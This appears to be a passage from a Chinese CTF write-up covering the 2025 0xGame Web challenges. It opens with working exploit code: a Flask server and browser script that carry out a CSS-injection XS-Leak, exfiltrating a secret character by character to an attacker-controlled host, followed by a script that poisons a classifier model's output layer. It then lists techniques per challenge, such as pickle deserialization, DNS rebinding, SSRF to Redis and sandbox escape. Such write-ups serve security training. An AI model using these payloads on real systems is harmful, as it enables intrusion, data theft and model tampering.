<script> const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms)); (async function () { while (true) { try { const res = await fetch('http://host.docker.internal:8000/next'); const note_id = await res.text(); if (note_id === 'done') break; const w = window.open('http://localhost:3000/view/' + note_id); await sleep(1000); if (w) w.close(); } catch (e) { console.error(e); await sleep(1000); } } })(); </script>

from flask import Flask, request from flask_cors import cross_origin import requests import string import re import os app = Flask(__name__) dicts = string.ascii_letters + string.digits + r'{}-_'' meta[name="secret"][content^="{}"] {{ background: url("http://host.docker.internal:8000/leak?c={}"); }}''' # 随机注册登录一个普通用户 data = { 'username': os.urandom(6).hex(), 'password': os.urandom(6).hex() } s = requests.Session() s.post('http://127.0.0.1:10800/register', data=data) s.post('http://127.0.0.1:10800/login', data=data) def report(): s.post('http://127.0.0.1:10800/report', data={ 'url': 'http://host.docker.internal:8000/exp.html' }) def paste(current_flag: str): global next_note_id if current_flag.endswith('}'): next_note_id = 'done' print('done') return' head, meta { display: block; } ''' for c in dicts: content += payload.format(current_flag + c, c) res = s.post('http://127.0.0.1:10800/paste', data={ 'content': '<div><style>' + content + '</style></div>' }) # 提取下一条笔记 ID match = re.findall(r"""/view/([^""]+)""", res.text) if match: next_note_id = match[0] print('next note id: ' + next_note_id) @cross_origin() @app.route('/next') def next(): return next_note_id @app.route('/exp.html') def exp_html(): with open('exp.html', 'r', encoding='utf-8') as f: return f.read() @app.route('/leak') def leak(): global flag c = request.args.get('c', '') flag += c print('flag: ' + flag) paste(flag) return 'ok' if __name__ == '__main__': paste('') report() app.run(host='0.0.0.0', port=8000)

import torch from model_server import SimpleDessertClassifier # 加载原始模型 model = SimpleDessertClassifier() sd = model.state_dict() # 找到输出层 last_linear_weight = None last_linear_bias = None for k in sorted(sd.keys()): if k.endswith('.weight') and sd[k].shape[0] == 3: last_linear_weight = k last_linear_bias = k.replace('.weight', '.bias') break if last_linear_weight is None: raise RuntimeError("未能找到输出层 Linear") # 污染输出层 sd[last_linear_weight] = torch.zeros_like(sd[last_linear_weight]) sd[last_linear_bias] = torch.tensor([-10.0, 10.0, 0.0]) # 保存污染后的模型 torch.save(sd, "poisoned_fixed.pth")

2025 0xGame Web 方向题目全解

第一周

RCE1

考点：或运算构造 system

Lemon

Http 的真理，我已解明

Rubbish_Unser

考点：hash 触发 Exception 中 __toString 魔术绕过 hash

Lemon_RevEnge

考点：污染 os.path.pardir 进行目录穿越

留言板（粉）

留言板_reVenge

第二周

你好，爪洼脚本

马哈鱼商店

考点：pickle 反序列化（文本协议）

DNS 想要玩

考点：进制绕过黑名单进行 dns 解析（dns 重绑定）

预期解是考 dns 重绑定

这真的是反序列化

考点：利用 SoapClient 触发 __call 用 ssrf 来打 Redis

404NotFound

Plus_plus

考点：限制字符的自增 rce

我只想要你的 PNG！

考点：文件名注入

第三周

消栈逃出沙箱 (1)反正不会有 2

解法:Typhon 梭哈沙箱逃逸

解法二：python 栈帧沙箱逃逸+traceback

文件查询器（蓝）

考点：file_get_contents 触发 phar 反序列化

长夜月

放开我的变量

考点：cp 通配符提权

这真的是文件上传

考点：js 审计之 ejs 渲染

New_Python!

考点：uuid8 加密

第四周

SpringShiro

绳网委托 Bottle 版

考点：abort 无回显

跨站脚本攻击叫 CSS 还是 XSS

考点：用 CSS 注⼊实现 XS Leak

旧吊带袜天使：想吃真蛋糕的 Stocking

考点：模型污染攻击

微信扫一扫，关注极客日志

更多推荐文章

相关免费在线工具